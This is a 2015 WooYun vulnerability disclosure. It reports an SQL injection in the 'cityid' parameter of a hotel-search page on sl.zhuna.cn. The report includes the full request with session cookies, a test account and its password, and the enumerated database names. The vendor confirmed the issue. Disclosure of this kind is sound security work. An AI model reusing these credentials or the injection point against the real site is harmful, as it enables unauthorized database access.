当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110995

漏洞标题:住哪网某站隐秘漏洞威胁诸多数据库

相关厂商:住哪网

漏洞作者: BMa

提交时间:2015-04-29 10:28

修复时间:2015-06-13 10:32

公开时间:2015-06-13 10:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-29: 细节已通知厂商并且等待厂商处理中
2015-04-29: 厂商已经确认,细节仅向厂商公开
2015-05-09: 细节向核心白帽子及相关领域专家公开
2015-05-19: 细节向普通白帽子公开
2015-05-29: 细节向实习白帽子公开
2015-06-13: 细节向公众公开

简要描述:

住哪网某站隐秘漏洞威胁诸多数据库
为什么说隐秘呢?因为这么多人包括我在内,第一轮都没发现

详细说明:

站点:http://sl.zhuna.cn/ 登录测试账号:wangling 密码:123456

POST /findhotel/search_hotel HTTP/1.1
Host: sl.zhuna.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: Hm_lvt_eac0c3863f9fda1a2681e8f1c2d552c5=1430107010,1430118061,1430204249,1430208479; agent_id=0; tma=246277199.20547671.1427675604008.1430101102388.1430204250537.6; tmd=31.246277199.20547671.1427675604008.; NTKF_T2D_CLIENTID=guestTEMP0CD9-53CC-0474-248C-456B681B6F5B; __utma=193237938.1894456180.1428821323.1428821323.1430208480.2; __utmz=193237938.1428821323.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zn%5Fqudao=405; Referer=http%3A%2F%2Fdns.aizhan.com%2Fhotels.yonyou.com%2F; union_id=shanglv_181; S0Oz_20eb_saltkey=Gc5Hh5zZ; S0Oz_20eb_lastvisit=1430201450; S0Oz_20eb_sid=l3yKnN; S0Oz_20eb_lastact=1430205056%09like.php%09; pgv_pvi=9588554298; safedog-flow-item=1CE7624EA61F953D599566A109560F97; agent%5Fid=4979209; _zn_log=1161813393553f4132dec17747654940; zhuna_union_ci_session=a%3A7%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%228cb4f195c0abf5864e4a7b4ff657e734%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22192.168.0.125%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A37.0%29+Gecko%2F20100101+Firefox%2F37.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1430270012%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22userinfo%22%3Ba%3A6%3A%7Bs%3A6%3A%22userid%22%3Bs%3A3%3A%22181%22%3Bs%3A8%3A%22username%22%3Bs%3A8%3A%22wangling%22%3Bs%3A8%3A%22agent_id%22%3Bs%3A7%3A%224979209%22%3Bs%3A10%3A%22permission%22%3Bs%3A5%3A%22A%2CC%2CD%22%3Bs%3A4%3A%22logo%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22fcfs%22%3Bd%3A0.070000000000000007%3B%7Ds%3A13%3A%22userOtherInfo%22%3Ba%3A1%3A%7Bs%3A8%3A%22msgCount%22%3Bi%3A0%3B%7D%7D50391b8b2e7c8fbef44e6c78f2154d25
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
key=&lat=39.96587242&lng=116.4490421&cityid=0101&lableid=&pg=1


参数:cityid

current user:    'user_r_slpt'
back-end DBMS: Microsoft SQL Server 2008
current database:    'hotel_9tour_cn'
available databases [8]:
[*] global_hotel
[*] hotel_9tour_cn
[*] master
[*] model
[*] msdb
[*] tempdb
[*] www_zhuna_cn_jipiao
[*] www_zhuna_cn_yufu2


上图:

1.jpg


2.jpg


3.jpg


4.jpg


5.jpg


6.jpg


漏洞证明:

修复方案:

版权声明:转载请注明来源 BMa@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-04-29 10:30

厂商回复:

非常感谢您反馈的信息,相关问题已交由技术处理。

最新状态:

暂无